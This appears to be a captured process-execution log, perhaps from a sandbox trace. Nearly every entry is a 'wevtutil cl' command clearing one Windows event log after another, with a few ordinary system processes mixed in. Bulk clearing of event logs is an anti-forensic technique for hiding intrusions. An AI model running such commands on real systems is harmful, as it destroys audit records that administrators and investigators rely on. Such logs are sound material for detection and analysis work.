"C:\Windows\system32\wevtutil.exe" cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-User Experience Virtualization-App Agent/Analytic"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-User Experience Virtualization-App Agent/Debug"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-User Experience Virtualization-App Agent/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-User Experience Virtualization-IPC/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AAD/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AAD/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ADSI/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ASN1/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ATAPort/General

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ATAPort/SATA-LPM

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ActionQueue/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-All-User-Install-Agent/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AllJoyn/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AllJoyn/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppHost/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppHost/ApplicationTracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppHost/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppHost/Internal

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppID/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-AppLocker/EXE and DLL"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-AppLocker/MSI and Script"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-AppLocker/Packaged app-Execution"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppModel-Runtime/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppModel-Runtime/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppModel-Runtime/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppModel-Runtime/Diagnostics

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppModel-State/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppModel-State/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppReadiness/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppReadiness/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppReadiness/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppSruProv

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppXDeployment/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppXDeployment/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppXDeploymentServer/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppXDeploymentServer/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppXDeploymentServer/Operational

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.Search_cw5n1h2txyewy

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppXDeploymentServer/Restricted

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ApplicabilityEngine/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ApplicabilityEngine/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Application Server-Applications/Admin"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Application Server-Applications/Analytic"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k UnistackSvcGroup

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Application Server-Applications/Debug"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Application Server-Applications/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Application-Experience/Program-Inventory

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Application-Experience/Program-Telemetry

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Application-Experience/Steps-Recorder

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppxPackaging/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppxPackaging/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AppxPackaging/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AssignedAccess/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AssignedAccess/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AssignedAccessBroker/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AssignedAccessBroker/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AsynchronousCausality/Causality

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Audio/CaptureMonitor

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Audio/GlitchDetection

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Audio/Informational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Audio/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Audio/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Audio/PlaybackManager

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Audit/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Authentication User Interface/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Authentication/ProtectedUser-Client

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-AxInstallService/Log

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BTH-BTHPORT/HCI

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BTH-BTHPORT/L2CAP

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BTH-BTHUSB/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BTH-BTHUSB/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BackgroundTaskInfrastructure/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Backup

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Base-Filtering-Engine-Connections/Operational

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Battery/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Biometrics/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Biometrics/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BitLocker-DrivePreparationTool/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BitLocker-DrivePreparationTool/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BitLocker-Driver-Performance/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-BitLocker/BitLocker Management"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-BitLocker/BitLocker Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BitLocker/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Bits-Client/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Bits-Client/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Bluetooth-Bthmini/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Bluetooth-MTPEnum/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Bluetooth-Policy/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BranchCache/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BranchCacheEventProvider/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BranchCacheMonitoring/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BranchCacheSMB/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-BranchCacheSMB/Operational

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-CAPI2/Catalog Database Debug"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CAPI2/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CDROM/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-COM/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-COM/ApartmentInitialize

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-COM/ApartmentUninitialize

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-COM/Call

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-COM/CreateInstance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-COM/ExtensionCatalog

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-COM/FreeUnusedLibrary

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-COM/RundownInstrumentation

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-COMRuntime/Activations

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-COMRuntime/MessageProcessing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-COMRuntime/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CertPoleEng/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Cleanmgr/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ClearTypeTextTuner/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CloudStore/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CloudStore/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CmiSetup/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CodeIntegrity/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CodeIntegrity/Verbose

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ComDlg32/Analytic

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ComDlg32/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Compat-Appraiser/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Compat-Appraiser/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Containers-BindFlt/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Containers-BindFlt/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Containers-Wcifs/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Containers-Wcifs/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Containers-Wcnfs/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Containers-Wcnfs/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CoreApplication/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CoreApplication/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CoreApplication/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CoreWindow/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CoreWindow/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CorruptedFileRecovery-Client/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CorruptedFileRecovery-Server/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Crashdump/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-CredUI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Crypto-BCRYPT/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Crypto-CNG/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Crypto-DPAPI/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Crypto-DPAPI/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Crypto-DSSEnh/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Crypto-NCrypt/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Crypto-RNG/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Crypto-RSAEnh/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-D3D10Level9/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-D3D10Level9/PerfTiming

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DAL-Provider/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DAL-Provider/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DAMM/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DCLocator/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DDisplay/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DDisplay/Logging

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DLNA-Namespace/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DNS-Client/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DSC/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DSC/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DSC/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DSC/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DUI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DUSER/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DXGI/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DXGI/Logging

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DXP/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Data-Pdf/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DataIntegrityScan/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DataIntegrityScan/CrashRecovery

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DateTimeControlPanel/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DateTimeControlPanel/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DateTimeControlPanel/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Deduplication/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Deduplication/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Deduplication/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Deduplication/Scrubbing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Defrag-Core/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Deplorch/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DesktopActivityModerator/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceAssociationService/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceConfidence/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceGuard/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceGuard/Verbose

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceSetupManager/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceSetupManager/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceSetupManager/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceSetupManager/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceSync/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceSync/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceUpdateAgent/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceUx/Informational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DeviceUx/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Devices-Background/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dhcp-Client/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dhcp-Client/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dhcpv6-Client/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Dhcpv6-Client/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-DiagCpl/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-DPS/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Diagnosis-DPS/Debug

